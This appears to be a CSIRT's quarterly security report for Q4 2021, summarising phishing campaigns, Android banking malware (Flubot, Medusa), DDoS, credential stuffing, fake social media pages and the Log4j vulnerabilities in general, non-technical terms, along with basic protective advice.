After a rather quiet third quarter for incidents, the figures show an overall increase of 40% for Q4 2021 compared with Q3 2021. Phishing is still the most common security incident. The key events of this end-of-year period were the Log4j vulnerability affecting all products using this library and particularly virulent malicious code.
Phishing
During the period, phishing accounted for 74% of the incidents handled by the POST CyberForce CSIRT.
The vast majority of phishing attacks targeted POST e-mail customers with an @pt.lu address by spoofing the webmail interface. Here is an example:
We have seen an array of phishing attempts impersonating LuxTrust. The most common of these is a kit in which malicious actors send victims a certificate reactivation request:
We have also observed phishing techniques using an HTML file attached to an e-mail that runs when the file is launched on a browser.
These techniques are used to bypass spam filters and therefore increase the chances of reaching a target, as well as to retrieve Microsoft Corporate login credentials.
With the approach of the holidays and the Christmas shopping season, we have also seen an increase in phishing attempts based on parcel deliveries. DHL remains the brand most affected by phishing attempts worldwide.
The final quarter of 2021 brought a resurgence in fraudulent call spoofing. The majority of the fraudulent calls were made from spoofed Luxembourg mobile numbers.
When the call is answered, a robot indicates that it is a call from law enforcement (police) and that illegal activities linked to the victim's number have been committed. The recipient is then invited to call back a number in the United States.
Malicious code
During this quarter, we have seen increased malware activity targeting Android users.
The first malware program is called Flubot. The process involves sending the victim a fictitious text message about receiving a package that contains a download link to the malware in the form of a .apk file. The program has the ability to steal sensitive information, such as bank details, passwords and phone numbers.
Social engineering techniques change regularly in order to deceive victims. The format of the message also changes to make detection more difficult for telecom operators. It spreads once the victims' contact list has been exfiltrated.
A second piece of malware called Medusa uses the same process. Again, a text message containing a link is sent to the victim to download the malware. This banking “Trojan horse” is capable of carrying out fraudulent attacks on phones by automating login steps, checking the victim's balance and making payments. It is also able to use native Android code to make itself more discreet and escape the attention of users. This makes it possible to track what is on the screen, for example, or to monitor clicks.
DDoS
The number of DDoS attacks remains stable, but the attacks are more intense. We saw a peak of 21 Gbps during this quarter.
The two techniques used are:
DNS Reply Flood
Global Abnormal UDP
Intrusions
Attempts at credential stuffing based on leaked account dictionaries were observed during the period.
Knowing what to look out for before an attack occurs is one way to avoid falling victim. We recommend that you check whether your login details have been leaked by entering your e-mail address on the website https://haveibeenpwned.com/.
In addition, activating two-factor authentication (MFA) is a further means of increasing the level of security of authentication methods on the internet.
Masquerade attacks
Malicious actors reuse legitimate content from our Facebook account on their fake page.
Even if the page you are visiting has a blue “verified” badge, this does not always guarantee that the page is official. Here is an excerpt from an unofficial Facebook page (1) without a “verified” badge incorporated into the official publication feed and a page (2) with the badge. This method makes attacks on social networks more credible.
To avoid all these scams, you can bookmark links to legitimate sites and access our social media content from our website.
Vulnerability
The discovery of the Log4shell zero-day vulnerability has had an unprecedented impact on the cybersecurity community worldwide since the vulnerability was disclosed on 9 December 2021. Log4j is an open source logging library programmed in the Java language. It allows applications’ operations to be traced. The presence of Log4j on a large number of solutions, coupled with a very large attack surface (i.e. potential for exploitation by attackers), makes the Log4shell vulnerability one of the most significant of the decade.
The vulnerability, identified as CVE-2021-44228, is considered critical. It has the highest CVSS score (CVSSv3 scores: 10.0). It allows arbitrary remote code execution (RCE) without authentication.
The patch provided by version 2.15 does not fully fix the flaw; the newly discovered vulnerability CVE-2021-45046 allows remote code execution. Due to the global reach and severity of this vulnerability, many researchers focused on finding vulnerabilities in the Log4j library, which contributed to the discovery of other cascading vulnerabilities and recursive patch announcements.
Another new vulnerability – CVE-2021-45105 – can be used to perpetrate a denial of service attack.
Finally, the last vulnerability released on Log4j in Q4 2021 is the CVE-2021-44832 with a CVSSv3 score of 6.6 (Medium). This also allows remote code execution but it is more difficult to exploit. In fact, the malicious actor needs to obtain modification rights for the configuration file linked to Log4j on the victim’s application to make it useable, which is particularly difficult.
Using a Security Operations Centre (SOC) allows organisations to constantly monitor activity on their IT systems so as to take quick and effective action in the event of an attack or anomaly.
